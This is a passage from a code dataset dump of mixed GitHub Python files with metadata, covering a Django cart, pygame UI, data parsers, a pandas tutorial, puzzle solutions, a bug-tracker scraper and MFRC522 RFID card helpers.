self.cart[product_id] = {\n \"quantity\": 0, \"price\": str(product.price)}\n if override_quantity:\n self.cart[product_id][\"quantity\"] = quantity\n else:\n self.cart[product_id][\"quantity\"] += quantity\n self.save()\n\n def save(self) -> None:\n # отметить сессию как \"измененную\", чтобы убедиться, что она будет сохранена\n self.session.modified = True\n\n def remove(self, product: Product) -> None:\n \"\"\"Удаление продукта из корзины.\"\"\"\n product_id = str(product.id)\n if product_id in self.cart:\n del self.cart[product_id]\n self.save()\n\n def clear(self) -> None:\n # удаление корзины из сессии\n del self.session[settings.CART_SESSION_ID]\n self.save()\n\n def get_total_price(self) -> Decimal:\n return sum(\n Decimal(item[\"price\"]) * item[\"quantity\"] for item in self.cart.values()\n )\n ","repo_name":"MikhailPrizba/Dyplom_project","sub_path":"farmer/cart/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"2493416689","text":"import pygame.font\n\nfrom button import Button\n\nclass Windows():\n def __init__(self,screen,msg1,msg2,msg3,left,top):\n self.screen = screen\n self.width, self.height = 200,200\n self.text_color = (255, 255, 255)\n self.bg_color = (20,40,150)\n self.font = pygame.font.SysFont(None, 60)\n self.rect = pygame.Rect(left,top,self.width, self.height)\n self.msg2_button = Button(screen, (170,300,160,40),text='Yes')\n self.msg3_button = Button(screen, (170,350,160,40),text='No')\n self.prep_msg(msg1)\n \n def prep_msg(self,msg1):\n self.msg_image = self.font.render(msg1, True, self.text_color,self.bg_color)\n \n def draw_windows(self):\n pygame.draw.rect(self.screen,self.bg_color,self.rect,0)\n self.screen.blit(self.msg_image, (170,220))\n self.msg2_button.draw_button()\n self.msg3_button.draw_button()\n","repo_name":"ssghlou/TicTacToe","sub_path":"windows.py","file_name":"windows.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"19758875104","text":"def main():\n P = int(input())\n soma_meloes = 0\n soma_goblins = 0\n while True:\n F, M, G = map(int, input().split())\n if F == 0 and M == 0 and G == 0:\n break\n elif P < F:\n soma_meloes += M\n soma_goblins += G\n print(f'Meloes roubados: {soma_meloes}')\n print(f'Goblins resgatados: {soma_goblins}')\n print('---')\n else:\n print(f'Meloes roubados: {soma_meloes}')\n print(f'Goblins resgatados: {soma_goblins}')\n print('---')\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"joseneto0/G4M3","sub_path":"1.5.py","file_name":"1.5.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38538104111","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def sortedArrayToBST(self, nums: List[int]) -> TreeNode:\n # node=TreeNode(nums[int(len(nums)/2)])\n # node.left,node.right=TreeNode(nums[int(len(nums)/3)]),TreeNode(nums[int(len(nums)/1.5)])\n if not nums: return\n mid_i=(len(nums)-1)//2\n node=TreeNode(nums[mid_i])\n node.left=self.sortedArrayToBST(nums[:mid_i])\n node.right=self.sortedArrayToBST(nums[mid_i+1:])\n return node","repo_name":"sethGu/leetcode","sub_path":"leetcode/108_将有序数组转换为二叉搜索树.py","file_name":"108_将有序数组转换为二叉搜索树.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41083858097","text":"from django.shortcuts import render\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import (\n generics, \n viewsets\n)\n\nfrom apps.menu.models import (\n FoodCategory,\n Topping, \n Food\n)\nfrom apps.menu.serializers import (\n ToppingSerializer,\n FoodSerializer, \n FoodCategorySerializer\n)\n\n\nclass ToppingListAPIView(generics.ListAPIView):\n queryset = Topping.objects.all()\n serializer_class =ToppingSerializer\n\n\nclass FoodCategoryListAPIView(generics.ListAPIView):\n queryset = FoodCategory.objects.filter(is_publish=True).prefetch_related('foods')\n serializer_class = FoodCategorySerializer\n\n\nclass FoodListAPIView(generics.ListAPIView):\n queryset = Food.objects.filter(is_publish=True)\n serializer_class = FoodSerializer\n\n def get_queryset(self):\n queryset = super().get_queryset()\n is_vegan = self.request.query_params.get('is_vegan')\n if is_vegan is not None:\n queryset = queryset.filter(is_vegan=is_vegan)\n is_special = self.request.query_params.get('is_special')\n if is_special is not None:\n queryset = queryset.filter(is_special=is_special)\n toppings = self.request.query_params.getlist('topping')\n if toppings:\n queryset = queryset.filter(toppings__name__in=toppings)\n return queryset\n","repo_name":"iimgera/tz_menu","sub_path":"apps/menu/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38435104008","text":"from turtle import Turtle\n\n\nclass ScoreBoard(Turtle):\n def __init__(self):\n super().__init__()\n self.color(\"white\")\n self.speed(\"fastest\")\n self.penup()\n self.hideturtle()\n self.score = 0\n # calling the scoreboard during initialization\n self.update_scoreboard()\n\n def update_scoreboard(self):\n self.goto(0, 220)\n self.write(f\"BREAK OUT Score: {self.score}\", align=\"center\", font=(\"Courier\", 40, \"normal\"))\n\n def update_point(self):\n self.score += 1\n self.clear()\n self.update_scoreboard()\n\n","repo_name":"skrindra/Day86_BreakOut_Game","sub_path":"scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12146070190","text":"'''\nfile : make_disease_chem_ctd.py\nauthor: Viswajith Venugopal\n\nParses CTD to find disease chemical links.\n\nUsage:\npython make_disease_chem_ctd [--output_dir OUTPUT_DIR]\n\nPositional Arguments:\ninput_dir : The directory of the CTD files.\n\nOptional Arugments: \n--output_dir : Directory to create output files. Defaults to the current working directory.\n\nExample Usage:\nInput File: CTD/0416_CTD\n\nOutput directory : outputs/disease-chemical/\n\nComamnd line:\npython parse_do_diseases.py CTD/0416_CTD --output_dir outputs/disease-chemical/\n\nOutput: \nctd_disease_chemical_parsed.tsv\n'''\n\nfrom collections import defaultdict\nimport os\nimport argparse\n\ndef get_chem_to_db(ctd_dir):\n ctd_chem_node_fname = os.path.join(ctd_dir, 'CTD_chemicals.tsv')\n chem_to_db_dict = {}\n # First, we load uniprot ids.\n with open(ctd_chem_node_fname, 'r') as ctd_gene_node_f:\n for line in ctd_gene_node_f:\n if line.startswith('#'):\n continue\n sp_line = line.strip('\\n').split('\\t')\n chem_id = sp_line[1]\n db_ids = sp_line[8]\n if len(db_ids) > 0:\n db_ids = db_ids.split('|')\n chem_to_db_dict[chem_id] = db_ids\n\n return chem_to_db_dict\n\ndef parse_ctd_chem_diseases(ctd_dir):\n \n chem_to_db_dict = get_chem_to_db(ctd_dir)\n disease_chem_list = []\n ctd_chem_dis_fname = os.path.join(ctd_dir, 'CTD_chemicals_diseases.tsv')\n with open(ctd_chem_dis_fname) as in_f:\n for line in in_f:\n if line.startswith('#'):\n continue\n sp_line = line.strip('\\n').split('\\t')\n chem_id = 'MESH:' + sp_line[1]\n if chem_id not in chem_to_db_dict:\n continue\n db_id = chem_to_db_dict[chem_id][0]\n disease_id = sp_line[4]\n inference_score = sp_line[7]\n if inference_score == \"\":\n inference_score = \"0\"\n disease_chem_list.append((disease_id, db_id,inference_score))\n\n return disease_chem_list\n \n\nparser = argparse.ArgumentParser(description='Parse CTD to find disease-chemical links.')\nparser.add_argument('input_dir', help='Input files directory. This should be the directory with all the CTD TSVs.')\nparser.add_argument('--output_dir', help='Directory to output files', default='.')\nargs = parser.parse_args()\n\noutput_fname = os.path.join(args.output_dir, \"ctd_disease_chem_parsed.tsv\")\n\ndisease_chem_list = parse_ctd_chem_diseases(args.input_dir)\n\nwith open(output_fname, 'w') as out_f:\n out_f.write('#Disease Chemical links from CTD.\\n')\n for (disease_id, db_id, iscore) in disease_chem_list:\n out_f.write('\\t'.join([disease_id, db_id,iscore]))\n out_f.write('\\n')\n","repo_name":"snap-stanford/miner-data","sub_path":"Disease-Chemical/make_disease_chem_ctd.py","file_name":"make_disease_chem_ctd.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"76"} +{"seq_id":"887820253","text":"import numpy as np\nimport warnings\nimport numbers\n\n#BLonD_Common imports\nfrom ..devtools import exceptions as excpt\n\n\ndef time_from_sampling(*args):\n\n if len(args) == 1 and isinstance(args[0], numbers.Number):\n def sample_func(time):\n return time + args[0]\n \n start = 0\n end = np.inf\n\n else: \n def sample_func(time):\n for r in args:\n if time >= r[1][0] and time < r[1][1]:\n return time + r[0]\n else:\n next_time = np.inf\n for r in args:\n if time <= r[1][0] and r[1][0] < next_time:\n next_time = r[1][0]\n\n return next_time\n \n start = np.inf\n end = 0\n for r in args:\n print(r)\n if r[1][0] < start:\n start = r[1][0]\n if r[1][1] > end:\n end = r[1][1]\n \n return sample_func, start, end\n \n# resolution = 1\n# if isinstance(resolution, numbers.Number):\n#\n# def sample_func(time):\n# return time + resolution\n# \n# start = 0\n# end = np.inf\n# \n# elif isinstance(resolution, tuple):\n# \n# def sample_func(time):\n# if time >= resolution[1][0] and time < resolution[1][1]:\n# return time + resolution[0]\n#\n# else:\n# return np.inf\n# \n# start, end = resolution[1]\n# \n# elif isinstance(resolution, list):\n# \n# def sample_func(time):\n# for r in resolution:\n# if time >= r[1][0] and time < r[1][1]:\n# return time + r[0]\n# else:\n# next_time = np.inf\n# for r in resolution:\n# if time <= r[1][0] and r[1][0] < next_time:\n# next_time = r[1][0]\n#\n# return next_time\n# \n# start = np.inf\n# end = 0\n# for r in resolution:\n# if r[1][0] < start:\n# start = r[1][0]\n# if r[1][1] > end:\n# end = r[1][1]\n\n \n\n# Calculate turn numbers from a passed time_range at times given by 'resolution'\n# If resolution is a float, turn numbers evenly spaced by 'resolution' s will\n# be returned.\n# If resolution is a tuple the first element is taken as the time spacing and\n# the second element should be a length 2 iterable of start/stop time \n# for interpolation\n# If resolution is a list, each element of the list is treated the same as if\n# a tuple had been passed\ndef points_by_time(time_range, resolution = 1E-3):\n \n if isinstance(resolution, float):\n cycle_points = time_points(time_range, resolution)\n\n elif isinstance(resolution, tuple):\n cycle_points = time_points(time_range, resolution[0],\n resolution[1][0], resolution[1][1])\n\n elif isinstance(resolution, list):\n cycle_points = []\n for i in range(len(resolution)):\n if len(cycle_points) > 0:\n if (resolution[i][1][0] <\n time_range[cycle_points[-1]] + resolution[i][0]):\n\n resolution[i][1][0] = (time_range[cycle_points[-1]]\n + resolution[i][0])\n\n cycle_points += time_points(time_range, resolution[i][0],\n resolution[i][1][0], resolution[i][1][1]).tolist()\n\n else:\n raise excpt.InputError(\"resolution must be float, tuple or list\")\n\n return np.asarray(cycle_points)\n\n\n#From start:stop identify indices of time_range with 'resolution' separation.\ndef time_points(time_range, resolution = 1E-3, start = None, stop = None):\n \n if start is None:\n start = time_range[0]\n if stop is None:\n stop = time_range[-1]\n\n if start < time_range[0]:\n warnings.warn(\"Start time before cycle starts,\"+\n \" defaulting to start\")\n start = time_range[0]\n if stop > time_range[-1]:\n warnings.warn(\"Stop time after cycle ends,\"+\n \" defaulting to cycle end\")\n stop = time_range[-1]\n\n point = 0\n\n while time_range[point] < start:\n point += 1\n \n pointList = [point]\n\n while time_range[point] < stop:\n if (time_range[point] >=\n time_range[pointList[-1]]\n + resolution):\n pointList.append(point)\n point += 1\n pointList.append(point-1)\n\n return np.asarray(pointList)","repo_name":"blond-org/blond_common","sub_path":"utilities/timing.py","file_name":"timing.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"13992451292","text":"# %% importing libraries\nimport numpy as np\nimport pandas as pd\nimport datetime\nimport random\n\n# %% date generator\ndef date_generator(date, month, year, number_of_dates):\n dates = []\n number_of_days = {1:31, 3:31, 4:30, 5:31, 6:30, 7:31, 8:31, 9:30, 10:31, 11:30, 12:31}\n for _ in range(number_of_dates):\n dates.append(f'{month}/{date}/{year}')\n \n date += 1\n leap_year = False\n if month == 2:\n if year % 4 == 0 or year % 100 == 0 :\n if year % 400 != 0 :\n leap_year = True\n\n if month == 2:\n if leap_year:\n if date > 29 :\n date = 1\n month += 1\n else:\n if date > 28 :\n date = 1\n month += 1\n else:\n if date > number_of_days[month]:\n date = 1\n month += 1\n\n if month > 12:\n month = 1\n year += 1\n\n return dates\n \n# %% \ndef time(number_of_values):\n time = []\n l = ['AM', 'PM']\n for _ in range(number_of_values):\n hour = random.randint(1,12)\n minutes = random.randint(0,59)\n sec = random.randint(0,59)\n if hour < 10:\n hour = f'0{hour}'\n if minutes < 10:\n minutes = f'0{minutes}'\n if sec < 10:\n sec = f'0{sec}'\n time.append(f'{hour}:{minutes}:{sec} {random.choice(l)}')\n return time\n# %% variables\ndata = pd.read_csv('myFile0.csv')\n\n# %% attributes and methods note :- inplace is available every where\ndata.index\ndata.columns\ndata.axes\ndata.dtypes\ndata.shape\ndata.info()\ndata.fav_number\ndata.sum(axis=0)\ndata[['firstname', 'lastname']]\ndata['date'] = date_generator(1, 1, 2016, 1000)\n\ndata = pd.read_csv('myFile0.csv').dropna(how='all')\ndata.insert(0, column = 'date', value=date_generator(1, 1, 2016, 1000))\n\n# %% broadcasting\ndata['scoring'].add(50)\ndata['scoring']+50\ndata['scoring'].sub(50)\ndata['scoring']-50\ndata['scoring'].mul(2)\ndata['scoring']*2\n\ndata.dropna()\ndata.drop(columns = ['address', 'scoring'], index = [2, 4, 6])\n\ndata['fav_number'].fillna(0) # for just one column\ndata.fillna(0) # for whole data set\n\ndef test(x):\n length = []\n for i in x:\n length.append(len(i))\n return length\n\ndata.sort_values('firstname', key = test)\n\ndata.sort_values(['firstname', 'lastname'], ascending=[True, False], na_position = 'first')\ndata['fav_number'].fillna(1, inplace=True)\n\ndata['fav_number_rank'] = data['fav_number'].rank(ascending=False).astype(int)\ndata.sort_values('fav_number_rank').head()\n\n\n# %% data filtering\ndata[\"fav_number\"] = data[\"fav_number\"].fillna(0).astype(\"int\")\ndata.sort_values(\"fav_number\")\n \ndata[np.logical_or(data[\"fav_number\"] > 500 , data[\"fav_number\"] < 200)].head()\n#other options and , np.logical_and , & , or , |\n\ndata[data[\"firstname\"].isin([\"Sara-Ann\", \"Margette\", \"Tani\"])]\n\ndata = pd.read_csv('myFile0.csv')\n\ndata[data[\"fav_number\"].isnull()]\n\ndata[data[\"fav_number\"].notnull()]\n\ndata[data[\"fav_number\"].between(200,800)]\n\ndata['date'] = date_generator(1, 1, 1990, 1000)\ndata['date'] = pd.to_datetime(data['date'])\n\ndata[data['date'].between(datetime.datetime(1990, 2, 1), datetime.datetime(1990, 10, 1))]\n\ndata[data['date'].between('1990-02-01', '1990-10-01')]\n\n# print(time(100))\n\n\ndata['time'] = pd.to_datetime(time(1000))\n# data.head()\ndata[data['time'].between('10:00AM', '12:00PM')]\n\n# %% duplicate\n\ndata.sort_values(['firstname','lastname'], inplace=True)\n\ndata[data['firstname'].duplicated()]\n\ndata[np.logical_not(data['firstname'].duplicated())]\n\ndata[~data['firstname'].duplicated()]\n\ndata.drop_duplicates(['firstname'])\n\n# %% indexing\ndata = pd.read_csv('myFile0.csv')\ndata['date'] = date_generator(1, 1, 1990, 1000)\ndata['date'] = pd.to_datetime(data['date'])\ndata['time'] = pd.to_datetime(time(1000))\n\ndata.set_index(\"id\", inplace=True)\ndata.sort_index(inplace=True)\ndata.head()\n\ndata.loc[100, 'firstname']\n\ndata.loc[100:200] # slicing \n\n\ndata.loc[[100, 200]]\n\ndata.loc[[100, 1000]]\n\n# same as above just uses index and for slicing last index not included\ndata.iloc[0:1000:100]['firstname']\n\ndata.loc[100, ['firstname', 'lastname']]\n\ndata.loc[100, 'firstname'] = 'SSara-Ann'\ndata.loc[100, 'firstname'] #doesn't work on iloc it makes a copy\n\ndata.loc[100, 'firstname'] = 'Sara-Ann'\ndata.loc[100, 'firstname']\n\ndata.rename(columns={'firstname': 'Firstname', 'lastname': 'Lastname'}, inplace=True)\ndata.head()\n\ndata.rename(index={100:99}, inplace=True)\ndata.head()\n\ndata.rename(index={99:100}, inplace=True)\ndata.head()\n\ndata.rename(columns={'Firstname': 'firstname', 'Lastname': 'lastname'}, inplace=True)\ndata.head()\n# %% \ndata = pd.read_csv('myFile0.csv')\ndata['date'] = date_generator(1, 1, 1990, 1000)\ndata['date'] = pd.to_datetime(data['date'])\ndata['time'] = pd.to_datetime(time(1000))\ndata.set_index(\"id\", inplace=True)\ndata.sort_index(inplace=True)\n\ndata.query('firstname == \"Sara-Ann\"')\n\ndata.query('lastname == \"Margret\"')\n\ndata.query('id != 101')\n\ndata.query('id > 500')\n\ndata.query('id > 500 and firstname == \"Sara-Ann\"')\n\ndata.query('firstname in [\"Sara-Ann\", \"Aaren\"]')\n\ndata.drop(100) # row with id 100\n\ndata.drop(['firstname', 'lastname'], axis=1, inplace=False)\n\nFirstname = data.pop('firstname')\ndata\nFirstname\n\n# %% \ndata = pd.read_csv('myFile0.csv')\ndata['date'] = date_generator(1, 1, 1990, 1000)\ndata['date'] = pd.to_datetime(data['date'])\ndata['time'] = pd.to_datetime(time(1000))\ndata.set_index(\"id\", inplace=True)\ndata.sort_index(inplace=True)\n\ndata.sample(n=100)\ndata.sample(frac=.25)\ndata.sample(n = 3, axis=1)\n\ndata.nsmallest(10, 'fav_number')\ndata.nlargest(10, 'fav_number')\n\ndata['fav_number'].nlargest(10)\n\ndata[np.logical_and(data['firstname']=='Sara-Ann',data['lastname']=='Wyn')]\ndata.where(data['fav_number']>800).dropna(how='all')\n\ndef multiply_100(number):\n return number*100\n\ndata['fav_number'].apply(multiply_100)\n\ndef best_person(row):\n \n score = row[2]\n fav_number = row[4]\n\n if score > 800:\n return 'Great person'\n \n elif score > 500 and fav_number > 500:\n return 'Nice person'\n \n else:\n return \"I don't know\"\n\ndata.apply(best_person, axis='columns')\n\n","repo_name":"Nisarg1463/PythonAI","sub_path":"pandas_dataframe.py","file_name":"pandas_dataframe.py","file_ext":"py","file_size_in_byte":6200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7261471280","text":"#!/usr/bin/env python3\nimport sys\n\ndef get_cost(costs, row, col):\n if row < 0 or col < 0:\n return sys.maxsize\n if row >= len(costs) or col >= len(costs[0]):\n return sys.maxsize\n return costs[row][col]\n\ndef main():\n grid = []\n costs = []\n for line in sys.stdin:\n row = [int(token) for token in line.strip()]\n grid.append(row)\n costs.append([None] * len(row))\n\n width = len(grid[0])\n height = len(grid)\n\n print(grid)\n print(costs)\n print(width)\n print(height)\n\n # it costs 0 to get to the top left\n costs[0][0] = 0\n\n # we want to calculate the bottom right\n stack = [ (height - 1, width - 1) ]\n\n while stack:\n print(f'stack size = {len(stack)}')\n r, c = stack[-1]\n\n if costs[r][c] is not None:\n stack.pop()\n continue\n\n missing = False\n if get_cost(costs, r - 1, c) is None:\n stack.append((r - 1, c))\n missing = True\n if get_cost(costs, r + 1, c) is None:\n stack.append((r + 1, c))\n missing = True\n if get_cost(costs, r, c - 1) is None:\n stack.append((r, c - 1))\n missing = True\n if get_cost(costs, r, c + 1) is None:\n stack.append((r, c + 1))\n missing = True\n\n if missing:\n continue\n\n costs[r][c] = min(get_cost(costs, r - 1, c),\n get_cost(costs, r + 1, c),\n get_cost(costs, r, c - 1),\n get_cost(costs, r, c + 1)) + grid[r][c]\n stack.pop()\n\n print(costs)\n # print( calc_cost(grid, costs, height - 1, width - 1) )\n\n # queue = []\n # queue.append( (height - 1, width - 1) )\n\n # while queue:\n # next_pos = queue.pop()\n\nif __name__ == '__main__':\n main()\n","repo_name":"boardwalk/aoc2021","sub_path":"aoc15/aoc15.py","file_name":"aoc15.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25519488582","text":"class Rule:\n def check(self):\n pass\n\n def __init__(self, text):\n self.text = text\n self.vowels = ('a', 'u', 'i', 'o', 'e')\n self.consonants = ('b', 'c', 'd', 'f', 'g', 'h', 'j', 'k', 'l', 'm',\n 'n', 'p', 'q', 'r', 's', 't', 'v', 'w', 'x', 'y',\n 'z')\n\n\nclass TwoConsonantLettersRule(Rule):\n '''\n Rule definition:\n\n Two consonant letters should divide by 'u'.\n\n Example:\n\n hello -> heruro\n '''\n def check(self):\n romaji = []\n\n for idx, letter in self.text:\n syllable = letter\n next_letter_in_bounds_of_text = idx + 1 < len(\n self.text) and idx >= 0\n if next_letter_in_bounds_of_text:\n next_letter = self.text[idx + 1]\n\n two_consonant_letters = letter in self.consonants \\\n and next_letter in self.consonants\n if two_consonant_letters:\n syllable = letter + 'u'\n\n romaji.append(syllable)\n\n return ''.join(romaji)\n\n\nclass ConsonantEndingRule(Rule):\n '''\n Rule definition:\n\n If word ending with consonant, 'u' should be added to end.\n '''\n def check(self):\n romaji = []\n\n for idx, letter in self.text:\n syllable = letter\n next_letter_in_bounds_of_text = idx + 1 < len(\n self.text) and idx >= 0\n if next_letter_in_bounds_of_text:\n next_letter = self.text[idx + 1]\n\n consonant_ending_letters = letter in self.consonants \\\n or letter in self.special and next_letter == ' '\n\n if consonant_ending_letters:\n syllable = letter + 'u'\n\n romaji.append(syllable)\n\n return ''.join(romaji)\n\n def __init__(self, text):\n self.text = text\n","repo_name":"atthealchemist/pyromaji","sub_path":"translators/rules.py","file_name":"rules.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17217632029","text":"# vim: set columns=80:\nimport os\nimport datetime\nimport csv\nimport urllib2\n\nimport mysite.base.helpers\n\nimport simplejson\nimport datetime\nimport glob\nimport lxml\nfrom ..search.models import Project, Bug\nimport codecs\nimport dateutil.parser\n\ndef get_tag_text_from_xml(xml_doc, tag_name, index = 0):\n \"\"\"Given an object representing text,\n and tag_name = 'tag', returns 'text'.\"\"\"\n tags = xml_doc.xpath(tag_name)\n try:\n return tags[index].text\n except IndexError:\n return ''\n assert False, \"You should not get here.\"\n\ndef count_people_involved(xml_doc):\n \"\"\"Strategy: Create a set of all the listed text values\n inside a (text) tag\n Return the length of said set.\"\"\"\n everyone = [tag.text for tag in xml_doc.xpath('.//who')]\n return len(set(everyone))\n\ndef bugzilla_date_to_datetime(date_string):\n return mysite.base.helpers.string2naive_datetime(date_string)\n\ndef who_tag_to_username_and_realname(who_tag):\n username = who_tag.text\n realname = who_tag.attrib.get('name', '')\n return username, realname\n\ndef xml2bug_object(xml_fd,\n canonical_bug_link_format_string=\n 'http://bugzilla.pculture.org/show_bug.cgi?id=%d'):\n \"\"\"xml fd: xml file descriptor 'containing' information about one bug\"\"\"\n parsed = lxml.etree.parse(xml_fd)\n gen_miro_project = lambda x: Project.objects.get_or_create(name='Miro')[0]\n bug_elt, = parsed.xpath('bug') # The comma asserts that the xpath() returns a list of length 1\n return bug_elt2bug_object(bug_elt, canonical_bug_link_format_string, gen_miro_project)\n\ndef bug_elt2bug_dict(parsed, canonical_bug_link_format_string,\n gen_project):\n date_reported_text = get_tag_text_from_xml(parsed, 'creation_ts')\n last_touched_text = get_tag_text_from_xml(parsed, 'delta_ts')\n u, r = who_tag_to_username_and_realname(parsed.xpath('.//reporter')[0])\n bug_id = int(get_tag_text_from_xml(parsed, 'bug_id'))\n keywords_text = get_tag_text_from_xml(parsed, 'keywords')\n keywords = map(lambda s: s.strip(),\n keywords_text.split(','))\n project = gen_project(parsed)\n status = get_tag_text_from_xml(parsed, 'bug_status')\n looks_closed = status in ('RESOLVED', 'WONTFIX', 'CLOSED', 'ASSIGNED')\n\n ret = dict(\n project = project,\n title = get_tag_text_from_xml(parsed, 'short_desc'),\n description = (get_tag_text_from_xml(parsed, 'long_desc/thetext') or\n '(Empty description)'),\n status = status,\n importance = get_tag_text_from_xml(parsed, 'bug_severity'),\n people_involved = count_people_involved(parsed),\n date_reported = bugzilla_date_to_datetime(date_reported_text),\n last_touched = bugzilla_date_to_datetime(last_touched_text),\n last_polled = datetime.datetime.now(),\n submitter_username = u,\n submitter_realname = r,\n canonical_bug_link = canonical_bug_link_format_string % bug_id,\n good_for_newcomers = ('bitesized' in keywords),\n looks_closed=looks_closed)\n return ret\n\ndef bug_elt2bug_object(parsed, canonical_bug_link_format_string,\n gen_project):\n ret = Bug()\n data = bug_elt2bug_dict(parsed, canonical_bug_link_format_string, gen_project)\n for key in data:\n setattr(ret, key, data[key])\n return ret\n\ndef bugzilla_query_to_bug_ids(csv_fd):\n doc = csv.reader(csv_fd)\n try:\n doc.next() # throw away header row\n except StopIteration:\n return []\n\n bug_ids = []\n \n for row in doc:\n bug_ids.append(int(row[0]))\n\n return bug_ids\n\ndef link2bug_id(url):\n first, rest = url.split('?id=')\n return int(rest)\n\ndef bitesized_bugs_csv_fd():\n csv_url = 'http://bugzilla.pculture.org/buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&field-1-0-0=bug_status&field-1-1-0=product&field-1-2-0=keywords&keywords=bitesized&product=Miro&query_format=advanced&remaction=&type-1-0-0=anyexact&type-1-1-0=anyexact&type-1-2-0=anywords&value-1-0-0=NEW%2CASSIGNED%2CREOPENED&value-1-1-0=Miro&value-1-2-0=bitesized&ctype=csv'\n csv_fd = urllib2.urlopen(csv_url)\n return csv_fd\n\ndef open_xml_url(xml_url):\n return urllib2.urlopen(xml_url)\n \ndef grab_miro_bugs():\n '''Input: Nothing.\n\n Side-effect: Loops over the Miro bitesized bugs (in the Miro bug tracker) and stores/updates them in our DB.'''\n csv_fd = bitesized_bugs_csv_fd()\n\n old_bitesized_bugs = Bug.all_bugs.filter(canonical_bug_link__startswith='http://bugzilla.pculture.org/')\n old_bitesized_bug_ids = [link2bug_id(k.canonical_bug_link) for k in old_bitesized_bugs]\n \n current_bitesized_bug_ids = bugzilla_query_to_bug_ids(csv_fd)\n\n bug_ids = current_bitesized_bug_ids + old_bitesized_bug_ids\n\n for bug_id in bug_ids:\n xml_url = 'http://bugzilla.pculture.org/show_bug.cgi?ctype=xml&id=%d' % bug_id\n xml_fd = open_xml_url(xml_url)\n bug = xml2bug_object(xml_fd)\n\n # If there is already a bug with this canonical_bug_link in the DB, just delete it.\n bugs_this_one_replaces = Bug.all_bugs.filter(canonical_bug_link=\n bug.canonical_bug_link)\n for delete_me in bugs_this_one_replaces:\n delete_me.delete()\n\n # With the coast clear, we save the bug we just extracted from the Miro tracker.\n bug.save()\n","repo_name":"rafpaf/OpenHatch","sub_path":"mysite/customs/miro.py","file_name":"miro.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"76"} +{"seq_id":"40388595396","text":"import MFRC522\n\n# This is the default key for authentication\nAUTH_KEY_DEFAULT = [0xFF,0xFF,0xFF,0xFF,0xFF,0xFF]\n#metainfoSector\nSECTOR_META_INFO = 1\n# StartSector\nSECTOR_DATA_START = 4\n\ndef isInt(v):\n try: i = int(v)\n except: return False\n return True\n\n# Method to read a sector content\ndef read_Sector(MIFAREReader, uid, key, sector):\n retVal = \"\"\n\n # Authenticate the sector\n status = MIFAREReader.MFRC522_Auth(MIFAREReader.PICC_AUTHENT1A, sector, key, uid)\n\n # Check if authenticated\n if status == MIFAREReader.MI_OK:\n #Read the data\n data = MIFAREReader.MFRC522_Read(sector)\n for i in data:\n if(i != 0):\n retVal = retVal + chr(i) \n else:\n break\n else:\n print(\"Authentication error sector %s\" % sector)\n\n return retVal\n\ndef read_Metadata(MIFAREReader, uid, key):\n dataSize = 0\n data = read_Sector(MIFAREReader, uid, key, SECTOR_META_INFO)\n print(\"Metadata is '%s'\" % data)\n if(isInt(data)):\n dataSize = int(data)\n return dataSize\n \n\ndef write_Metadata(MIFAREReader, uid, key, data):\n dataSize = str(len(data))\n write_Sector(MIFAREReader, uid, key, SECTOR_META_INFO, dataSize)\n\ndef clear_Metadata(MIFAREReader, uid, key):\n write_Sector(MIFAREReader, uid, key, SECTOR_META_INFO, \"\")\n\ndef clear_Sector(MIFAREReader, uid, key, sector):\n write_Sector(MIFAREReader, uid, key, sector, \"\")\n\n# Method to write a sector content\ndef write_Sector(MIFAREReader, uid, key, sector, data):\n if sector == 0 or sector % 4 == 3:\n print(\"Sector %s can't be written\" % sector)\n \n # Variable for the data to write\n byteData = bytearray()\n byteData.extend(data.encode('latin-1')) \n\n #Fill rest of the array with 0x00\n while len(byteData) < 16:\n byteData.append(0x00)\n \n if(len(byteData) == 16): \n write_SectorBytes(MIFAREReader, uid, key, sector, byteData)\n else:\n print(\"Data is too long %s bytes\" % (len(data), data))\n\n\n# Method to write a sector content\ndef write_SectorBytes(MIFAREReader, uid, key, sector, byteData):\n\n # Authenticat the sector\n status = MIFAREReader.MFRC522_Auth(MIFAREReader.PICC_AUTHENT1A, sector, key, uid)\n\n if status == MIFAREReader.MI_OK:\n if(len(byteData) == 16): \n print(\"Sector %s will now be filled with '%s'\" % (sector, str(byteData)))\n # Write the data\n MIFAREReader.MFRC522_Write(sector, byteData)\n else:\n print(\"Data is too long %s bytes\" % (len(byteData), str(byteData)))\n else:\n print(\"Authentication error sector %s\" % 